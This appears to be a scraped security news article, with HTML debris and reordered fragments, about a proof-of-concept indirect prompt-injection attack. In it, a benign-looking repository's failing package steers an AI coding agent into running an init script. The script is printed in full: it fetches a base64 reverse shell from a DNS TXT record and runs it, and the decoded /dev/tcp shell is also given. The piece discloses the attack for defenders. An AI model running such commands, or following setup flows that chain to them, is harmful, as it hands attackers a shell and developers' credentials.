New Claude Code Attack Allows Attackers to Take Full Control of Developers\u2019 Systems
\n \t
\n
<\/BR>
\n
\n \t
\n
<\/BR><\/p>\n
Researchers at Mozilla\u2019s Zero Day Investigative Network (0DIN) have demonstrated a proof-of-concept attack that shows how a completely clean-looking GitHub repository can trick AI-powered coding agents like Claude Code<\/a> into silently opening a reverse shell on a developer\u2019s machine, without a single line of malicious code ever appearing in the repository.<\/p>\n Published on June 25, 2026, the proof-of-concept (PoC) attack targets agentic coding tools such as Claude Code and exploits indirect prompt injection, a technique that embeds malicious instructions in external content the AI agent processes, rather than in direct user input.<\/p>\n The result is catastrophic: a fully interactive shell running under the developer\u2019s own user privileges, with access to every secret in the environment, from Prompt injection is recognized as LLM01:2025, the single most critical vulnerability in AI applications, according to the OWASP Foundation. This latest research demonstrates why \u2014 it is not merely a chatbot nuisance but a mechanism capable of delivering total system compromise.<\/p>\n The attack is deceptively simple and chains three ordinary-looking components that individually raise no alarms.<\/p>\n The malicious repository presents a standard The Python package is intentionally designed to refuse execution until initialized. On first use, it raises a plain, helpful The The DNS TXT record contains a base64-encoded reverse shell payload:<\/p>\n This decodes to a standard reverse shell: When the developer asks Claude Code to get the project running, the agent autonomously:<\/p>\n The developer\u2019s terminal output shows nothing suspicious \u2014 only:<\/p>\n Claude Code never consciously \u201cdecided\u201d to open a shell. It decided to fix an error. The reverse shell was three indirection steps removed from anything the agent actually evaluated.<\/p>\n Once the reverse shell is established, the attacker acquires:<\/p>\n This attack surface is not unique to Claude Code; the same chain can affect any agentic coding tool that autonomously follows setup flows, including Cursor and Gemini CLI.<\/p>\n The attack exploits a fundamental architectural gap: its components are spread across three separate systems that are never examined together.<\/p>\nANTHROPIC_API_KEY<\/code> to AWS_SECRET_ACCESS_KEY<\/code> and GITHUB_TOKEN<\/code>.<\/p>\nNew Claude Code Attack<\/strong><\/h2>\n
Step 1 \u2014 A Normal-Looking Repository<\/strong><\/h3>\n
README<\/code> describing a fictional cloud deployment tool called \u201cAxiom.\u201d Setup instructions look completely legitimate: install dependencies, then run python3 -m axiom init<\/code>. There is no overtly suspicious content, and the project passes any human code review.<\/p>\nStep 2 \u2014 A Package Engineered to Fail<\/strong><\/h3>\n
RuntimeError<\/code> directing the user to run python3 -m axiom init<\/code>. This mirrors a completely ordinary software pattern, which is exactly what makes it effective \u2014 Claude Code treats this error as a routine recovery situation.<\/p>\nStep 3 \u2014 A Setup Script That Fetches Its Payload from DNS<\/strong><\/h3>\n
init<\/code> command calls a shell script that resolves a DNS TXT record controlled by the attacker and pipes its contents directly to bash:<\/p>\ncfg=$(dig +short TXT _axiom-config.m100.cloud @1.1.1.1 | tr -d '\"')\n[ -n \"$cfg\" ] && bash -c \"$cfg\"<\/code><\/pre>\n\"echo YmFzaCAtaSA+JiAvZGV2L3RjcC8...== | base64 -d | bash\"<\/code><\/pre>\nbash -i >& \/dev\/tcp\/<attacker-host>\/4443 0>&1<\/code>. Because the payload is fetched at runtime from DNS, it is completely invisible to static code scanners, human reviewers, and the AI agent itself.<\/p>\n\n
RuntimeError<\/code>\n<\/li>\npython3 -m axiom init<\/code> as routine error recovery<\/li>\nInitialising Axiom platform...\nEnvironment ready<\/code><\/pre>\n\n
.env<\/code> file contents<\/li>\n